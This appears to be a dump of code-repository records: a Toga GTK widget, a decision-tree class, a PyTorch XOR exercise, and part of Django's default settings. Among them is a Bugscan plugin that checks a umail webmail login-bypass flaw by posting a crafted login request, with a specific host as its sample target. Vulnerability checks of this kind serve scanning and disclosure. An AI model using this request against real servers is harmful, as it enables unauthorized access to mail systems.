] | null | null | null | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
] | null | null | null | from ..libs import Gtk
from ..window import GtkViewport
from .base import Widget
class SplitContainer(Widget):
def create(self):
# Use Paned widget rather than VPaned and HPaned deprecated widgets
# Note that orientation in toga behave unlike Gtk
if self.interface.VERTICAL:
self.native = Gtk.Paned.new(Gtk.Orientation.HORIZONTAL)
elif self.interface.HORIZONTAL:
self.native = Gtk.Paned.new(Gtk.Orientation.VERTICAL)
else:
raise ValueError("Allowed orientation is VERTICAL or HORIZONTAL")
self.native.interface = self.interface
self.ratio = None
def add_content(self, position, widget, flex):
widget.viewport = GtkViewport(self.native)
# Add all children to the content widget.
for child in widget.interface.children:
child._impl.container = widget
if position >= 2:
raise ValueError('SplitContainer content must be a 2-tuple')
if position == 0:
self.native.set_wide_handle(True)
self.native.pack1(widget.native, flex, False)
elif position == 1:
self.native.set_wide_handle(True)
self.native.pack2(widget.native, flex, False)
def set_app(self, app):
if self.interface.content:
self.interface.content[0].app = self.interface.app
self.interface.content[1].app = self.interface.app
def set_window(self, window):
if self.interface.content:
self.interface.content[0].window = self.interface.window
self.interface.content[1].window = self.interface.window
def set_direction(self, value):
self.interface.factory.not_implemented('SplitContainer.set_direction()')
| 36.102041 | 80 | 0.654607 | from ..libs import Gtk
from ..window import GtkViewport
from .base import Widget
class SplitContainer(Widget):
def create(self):
if self.interface.VERTICAL:
self.native = Gtk.Paned.new(Gtk.Orientation.HORIZONTAL)
elif self.interface.HORIZONTAL:
self.native = Gtk.Paned.new(Gtk.Orientation.VERTICAL)
else:
raise ValueError("Allowed orientation is VERTICAL or HORIZONTAL")
self.native.interface = self.interface
self.ratio = None
def add_content(self, position, widget, flex):
widget.viewport = GtkViewport(self.native)
for child in widget.interface.children:
child._impl.container = widget
if position >= 2:
raise ValueError('SplitContainer content must be a 2-tuple')
if position == 0:
self.native.set_wide_handle(True)
self.native.pack1(widget.native, flex, False)
elif position == 1:
self.native.set_wide_handle(True)
self.native.pack2(widget.native, flex, False)
def set_app(self, app):
if self.interface.content:
self.interface.content[0].app = self.interface.app
self.interface.content[1].app = self.interface.app
def set_window(self, window):
if self.interface.content:
self.interface.content[0].window = self.interface.window
self.interface.content[1].window = self.interface.window
def set_direction(self, value):
self.interface.factory.not_implemented('SplitContainer.set_direction()')
| true | true |
f732667678fe56d63a50d6cdfc0a2bcc6b9ff02f | 5,812 | py | Python | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | 3 | 2019-03-25T14:15:30.000Z | 2019-08-29T15:02:47.000Z | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | null | null | null | lh/DecisionTree2.py | skyf0cker/Statistical_learning_method | 8151f3b8595ac086f08d161dc0cb961946f4b7fc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-02-03 15:17:08
# @Author : Vophan Lee (vophanlee@gmail.com)
# @Link : https://www.jianshu.com/u/3e6114e983ad
from sklearn.datasets import make_classification
import numpy as np
import math
class Decision_Tree(object):
"""
this is a class to build the decision tree
"""
feature_list = []
gain_list = []
dim_list = []
index = 0
def __init__(self):
super(Decision_Tree, self).__init__()
self.features = 5
self.samples = 100
self.data = make_classification(
n_samples=self.samples, n_features=self.features, n_classes=2)
self.empirical_entropy = self.cal_emp_entropy(self.data)
def cal_emp_entropy(self, data):
"""
calculate the empirical entropy
"""
data_0 = []
data_1 = []
for i in enumerate(data[1]):
if i[1] == 0:
data_0.append(data[0][i[0]])
else:
data_1.append(data[0][i[0]])
entropy = 0
for data_ in [data_0, data_1]:
entropy += - \
(len(data_) / len(data[0])) * \
math.log2(len(data_) / len(data[0]))
return entropy
def div_point(self, dim_data):
"""
decide the divided point of each feature,here we sopposed that dim_data is a continuous dataset
dim_data: tuple
"""
def dichotomy(dim_data):
div_points = np.zeros((1, self.samples)).reshape(self.samples)
for i in enumerate(dim_data):
if i[0] == len(dim_data) - 1:
break
div_points[i[0]] = (dim_data[i[0] + 1] + i[1]) / 2
return div_points
dim_data = list(dim_data)
dim_data = np.array(dim_data)
dim_data = dim_data[:, dim_data[0].argsort()]
dim_data = tuple(dim_data)
div_points = dichotomy(dim_data[1])
information_gain_list = []
for i in div_points:
div_index = list(div_points).index(i) + 1
front = dim_data[1][:div_index]
behind = dim_data[1][div_index:]
front_flag = dim_data[0][:div_index]
behind_flag = dim_data[0][div_index:]
front_data = (front, front_flag)
behind_data = (behind, behind_flag)
if len(front_data[0]) == 1 or ((front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
behind_entropy = self.cal_emp_entropy(behind_data)
information_gain = self.empirical_entropy - \
(behind_entropy * (len(behind) / len(dim_data[0])))
information_gain_list.append(information_gain)
elif len(behind_data[0]) == 1 or ((behind_data[1] == behind_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
front_entropy = self.cal_emp_entropy(front_data)
information_gain = self.empirical_entropy - \
(front_entropy * (len(front) / len(dim_data[0])))
information_gain_list.append(information_gain)
elif (front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) == len(dim_data[0]) / 2:
return -1, div_points[int(len(dim_data[0]) / 2 - 1)]
else:
front_entropy = self.cal_emp_entropy(front_data)
behind_entropy = self.cal_emp_entropy(behind_data)
information_gain = self.empirical_entropy - (front_entropy * (len(front) / len(
dim_data[0])) + behind_entropy * (len(behind) / len(dim_data[0])))
information_gain_list.append(information_gain)
max_information_gain = max(information_gain_list)
return max_information_gain, div_points[information_gain_list.index(max_information_gain)]
def compare_features(self):
"""
here we choose a maximium information gain among all features
"""
gain_list_tmp = []
point_list = []
for i in range(self.features):
information_gain, div_point = self.div_point((self.data[1], self.data[0].transpose()[i]))
gain_list_tmp.append(information_gain)
point_list.append(div_point)
com_matrix = np.array([
gain_list_tmp,
point_list,
range(self.features)
])
com_matrix = com_matrix[:, com_matrix[0].argsort()]
Decision_Tree.feature_list = list(com_matrix[1])
Decision_Tree.gain_list = list(com_matrix[0])
Decision_Tree.dim_list = list(com_matrix[2])
def planet_tree(self, data):
"""
here is the process of planeting the tree
data: without flag
"""
feature = Decision_Tree.feature_list[Decision_Tree.index]
dim = Decision_Tree.dim_list[Decision_Tree.index]
Decision_Tree.index += 1
if Decision_Tree.gain_list[Decision_Tree.feature_list.index(feature)] == -1 or Decision_Tree.index >= len(Decision_Tree.feature_list) - 1:
return tree_node([x for x in data.transpose()[int(dim)] if x < feature],
[x for x in data.transpose()[int(dim)] if x > feature],
feature)
else:
return tree_node(self.planet_tree([x for x in data[0] if x < feature]),self.planet_tree([x for x in data[0] if x > feature]), feature)
class tree_node(object):
"""
this is the node of the decision tree
"""
def __init__(self, left, right, data):
self.left=left
self.right=right
self.data=data
| 41.219858 | 147 | 0.567275 |
from sklearn.datasets import make_classification
import numpy as np
import math
class Decision_Tree(object):
feature_list = []
gain_list = []
dim_list = []
index = 0
def __init__(self):
super(Decision_Tree, self).__init__()
self.features = 5
self.samples = 100
self.data = make_classification(
n_samples=self.samples, n_features=self.features, n_classes=2)
self.empirical_entropy = self.cal_emp_entropy(self.data)
def cal_emp_entropy(self, data):
data_0 = []
data_1 = []
for i in enumerate(data[1]):
if i[1] == 0:
data_0.append(data[0][i[0]])
else:
data_1.append(data[0][i[0]])
entropy = 0
for data_ in [data_0, data_1]:
entropy += - \
(len(data_) / len(data[0])) * \
math.log2(len(data_) / len(data[0]))
return entropy
def div_point(self, dim_data):
def dichotomy(dim_data):
div_points = np.zeros((1, self.samples)).reshape(self.samples)
for i in enumerate(dim_data):
if i[0] == len(dim_data) - 1:
break
div_points[i[0]] = (dim_data[i[0] + 1] + i[1]) / 2
return div_points
dim_data = list(dim_data)
dim_data = np.array(dim_data)
dim_data = dim_data[:, dim_data[0].argsort()]
dim_data = tuple(dim_data)
div_points = dichotomy(dim_data[1])
information_gain_list = []
for i in div_points:
div_index = list(div_points).index(i) + 1
front = dim_data[1][:div_index]
behind = dim_data[1][div_index:]
front_flag = dim_data[0][:div_index]
behind_flag = dim_data[0][div_index:]
front_data = (front, front_flag)
behind_data = (behind, behind_flag)
if len(front_data[0]) == 1 or ((front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
behind_entropy = self.cal_emp_entropy(behind_data)
information_gain = self.empirical_entropy - \
(behind_entropy * (len(behind) / len(dim_data[0])))
information_gain_list.append(information_gain)
elif len(behind_data[0]) == 1 or ((behind_data[1] == behind_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
front_entropy = self.cal_emp_entropy(front_data)
information_gain = self.empirical_entropy - \
(front_entropy * (len(front) / len(dim_data[0])))
information_gain_list.append(information_gain)
elif (front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) == len(dim_data[0]) / 2:
return -1, div_points[int(len(dim_data[0]) / 2 - 1)]
else:
front_entropy = self.cal_emp_entropy(front_data)
behind_entropy = self.cal_emp_entropy(behind_data)
information_gain = self.empirical_entropy - (front_entropy * (len(front) / len(
dim_data[0])) + behind_entropy * (len(behind) / len(dim_data[0])))
information_gain_list.append(information_gain)
max_information_gain = max(information_gain_list)
return max_information_gain, div_points[information_gain_list.index(max_information_gain)]
def compare_features(self):
gain_list_tmp = []
point_list = []
for i in range(self.features):
information_gain, div_point = self.div_point((self.data[1], self.data[0].transpose()[i]))
gain_list_tmp.append(information_gain)
point_list.append(div_point)
com_matrix = np.array([
gain_list_tmp,
point_list,
range(self.features)
])
com_matrix = com_matrix[:, com_matrix[0].argsort()]
Decision_Tree.feature_list = list(com_matrix[1])
Decision_Tree.gain_list = list(com_matrix[0])
Decision_Tree.dim_list = list(com_matrix[2])
def planet_tree(self, data):
feature = Decision_Tree.feature_list[Decision_Tree.index]
dim = Decision_Tree.dim_list[Decision_Tree.index]
Decision_Tree.index += 1
if Decision_Tree.gain_list[Decision_Tree.feature_list.index(feature)] == -1 or Decision_Tree.index >= len(Decision_Tree.feature_list) - 1:
return tree_node([x for x in data.transpose()[int(dim)] if x < feature],
[x for x in data.transpose()[int(dim)] if x > feature],
feature)
else:
return tree_node(self.planet_tree([x for x in data[0] if x < feature]),self.planet_tree([x for x in data[0] if x > feature]), feature)
class tree_node(object):
def __init__(self, left, right, data):
self.left=left
self.right=right
self.data=data
| true | true |
f7326756f8ad7832b4a6f8c87d9131cd0c7553a9 | 721 | py | Python | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
#from:http://www.wooyun.org/bugs/wooyun-2010-093049
import re,time
def assign(service, arg):
if service == "umail":
return True, arg
def audit(arg):
url = arg + '/webmail/fast/index.php?module=operate&action=login'
postdata = 'mailbox=test@domain.com&link=?'
code, head, res, errcode, _ = curl.curl2(url,post=postdata)
if code == 200 and '<meta http-equiv="refresh" content="0; URL=index.php">' in res:
security_warning('make a session,access the file which guest not be allowed:post mailbox=test@domain.com&link=? to %s'%url)
if __name__ == '__main__':
from dummy import *
audit(assign('umail', 'http://oa.shindoo.com:810/')[1]) | 34.333333 | 132 | 0.651872 |
import re,time
def assign(service, arg):
if service == "umail":
return True, arg
def audit(arg):
url = arg + '/webmail/fast/index.php?module=operate&action=login'
postdata = 'mailbox=test@domain.com&link=?'
code, head, res, errcode, _ = curl.curl2(url,post=postdata)
if code == 200 and '<meta http-equiv="refresh" content="0; URL=index.php">' in res:
security_warning('make a session,access the file which guest not be allowed:post mailbox=test@domain.com&link=? to %s'%url)
if __name__ == '__main__':
from dummy import *
audit(assign('umail', 'http://oa.shindoo.com:810/')[1]) | true | true |
f73267d55ff079ff1596cde36652108c05688ded | 2,752 | py | Python | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | # %% [markdown]
# [](https://colab.research.google.com/github/jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring/blob/main/DNN_HW5/main.ipynb)
# %% [markdown]
# # DNN HW5 : #9
#
# 2022.03.23
# 박준혁
# %%
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# %% [markdown]
# Create XOR dataset with torch.FloatTensor
# %%
# xor dataset
x = torch.FloatTensor([[0, 0], [0, 1], [1, 0], [1, 1]])
y = torch.FloatTensor([[0], [1], [1], [0]])
# %% [markdown]
# 1. NN model - 10 hidden layer with 4 nodes each
# %%
# neural network 10 hidden layers with 4 nodes each
class NN10(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(2, 4, bias=True)
self.fc2 = nn.Linear(4, 4)
self.fc3 = nn.Linear(4, 4)
self.fc4 = nn.Linear(4, 4)
self.fc5 = nn.Linear(4, 4)
self.fc6 = nn.Linear(4, 4)
self.fc7 = nn.Linear(4, 4)
self.fc8 = nn.Linear(4, 4)
self.fc9 = nn.Linear(4, 4)
self.fc10 = nn.Linear(4, 1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
x = F.relu(self.fc9(x))
x = F.sigmoid(self.fc10(x))
return x
# %%
nn10 = NN10()
optimizer10 = optim.SGD(nn10.parameters(), lr=0.1)
epochs = 10000
for epoch in range(epochs):
optimizer10.zero_grad()
y_pred10 = nn10(x)
ce10 = F.binary_cross_entropy(y_pred10, y)
ce10.backward()
optimizer10.step()
if epoch % 1000 == 0:
print("Epoch: {:4d}/{}".format(epoch, epochs), end=" ")
print("Cost: {:.6f}".format(ce10.item()))
# %% [markdown]
# 2. NN model - 2 hidden layer with 4 nodes each
# %%
# neural network 2 hidden layers with 4 nodes each
class NN02(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(2, 4, bias=True)
self.fc2 = nn.Linear(4, 4)
self.fc3 = nn.Linear(4, 1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.sigmoid(self.fc3(x))
return x
# %%
nn02 = NN02()
optimizer02 = optim.SGD(nn02.parameters(), lr=0.1)
epochs = 10000
for epoch in range(epochs):
optimizer02.zero_grad()
y_pred02 = nn02(x)
ce02 = F.binary_cross_entropy(y_pred02, y)
ce02.backward()
optimizer02.step()
if epoch % 1000 == 0:
print("Epoch: {:4d}/{}".format(epoch, epochs), end=" ")
print("Cost: {:.6f}".format(ce02.item()))
| 26.461538 | 202 | 0.579215 |
py as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
x = torch.FloatTensor([[0, 0], [0, 1], [1, 0], [1, 1]])
y = torch.FloatTensor([[0], [1], [1], [0]])
class NN10(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(2, 4, bias=True)
self.fc2 = nn.Linear(4, 4)
self.fc3 = nn.Linear(4, 4)
self.fc4 = nn.Linear(4, 4)
self.fc5 = nn.Linear(4, 4)
self.fc6 = nn.Linear(4, 4)
self.fc7 = nn.Linear(4, 4)
self.fc8 = nn.Linear(4, 4)
self.fc9 = nn.Linear(4, 4)
self.fc10 = nn.Linear(4, 1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
x = F.relu(self.fc9(x))
x = F.sigmoid(self.fc10(x))
return x
nn10 = NN10()
optimizer10 = optim.SGD(nn10.parameters(), lr=0.1)
epochs = 10000
for epoch in range(epochs):
optimizer10.zero_grad()
y_pred10 = nn10(x)
ce10 = F.binary_cross_entropy(y_pred10, y)
ce10.backward()
optimizer10.step()
if epoch % 1000 == 0:
print("Epoch: {:4d}/{}".format(epoch, epochs), end=" ")
print("Cost: {:.6f}".format(ce10.item()))
class NN02(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(2, 4, bias=True)
self.fc2 = nn.Linear(4, 4)
self.fc3 = nn.Linear(4, 1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.sigmoid(self.fc3(x))
return x
nn02 = NN02()
optimizer02 = optim.SGD(nn02.parameters(), lr=0.1)
epochs = 10000
for epoch in range(epochs):
optimizer02.zero_grad()
y_pred02 = nn02(x)
ce02 = F.binary_cross_entropy(y_pred02, y)
ce02.backward()
optimizer02.step()
if epoch % 1000 == 0:
print("Epoch: {:4d}/{}".format(epoch, epochs), end=" ")
print("Cost: {:.6f}".format(ce02.item()))
| true | true |
f732682b1cfe1fafeaca346811b06f346f04b564 | 22,189 | py | Python | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 90 | 2017-08-24T18:57:21.000Z | 2022-03-04T01:58:56.000Z | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 27 | 2017-04-01T15:06:36.000Z | 2021-02-08T20:19:58.000Z | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | ngishjonathan/gallery | dd67f28887316d6277927c667f6641d26317b0b8 | [
"MIT"
] | 11 | 2019-02-26T14:30:28.000Z | 2021-12-31T05:04:08.000Z | # -*- coding: utf-8 -*-
"""
Default Django settings. Override these with settings in the module pointed to
by the DJANGO_SETTINGS_MODULE environment variable.
"""
from __future__ import unicode_literals
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to user current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# Encoding of files read from disk (template and initial SQL files).
FILE_CHARSET = 'utf-8'
# Email address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Database connection info. If left empty, will default to the dummy backend.
DATABASES = {}
# Classes used to implement DB routing behavior.
DATABASE_ROUTERS = []
# The email backend to use. For possible shortcuts see django.core.mail.
# The default is to use the SMTP backend.
# Third-party backends can be specified by providing a Python path
# to a module that defines an EmailBackend class.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Host for sending email.
EMAIL_HOST = 'localhost'
# Port for sending email.
EMAIL_PORT = 25
# Whether to send SMTP 'Date' header in the local time zone or in UTC.
EMAIL_USE_LOCALTIME = False
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
# List of strings representing installed apps.
INSTALLED_APPS = []
TEMPLATES = []
# Default form rendering class.
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
# Default email address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages send with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
# re.compile(r'^/apple-touch-icon.*\.png$'),
# re.compile(r'^/favicon.ico$),
# re.compile(r'^/robots.txt$),
# re.compile(r'^/phpmyadmin/),
# re.compile(r'\.(cgi|php|pl)$'),
# ]
IGNORABLE_404_URLS = []
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = None
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = None
# List of upload handler classes to be applied in order.
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# Maximum size, in bytes, of a request before it will be streamed to the
# file system instead of into memory.
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum size in bytes of request data (excluding file uploads) that will be
# read before a SuspiciousOperation (RequestDataTooBig) is raised.
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum number of GET/POST parameters that will be read before a
# SuspiciousOperation (TooManyFieldsSent) is raised.
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# Directory in which upload streamed files will be temporarily saved. A value of
# `None` will make Django use the operating system's default temporary directory
# (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_PERMISSIONS = None
# The numeric mode to assign to newly-created directories, when uploading files.
# The value should be a mode as you'd pass to os.chmod;
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
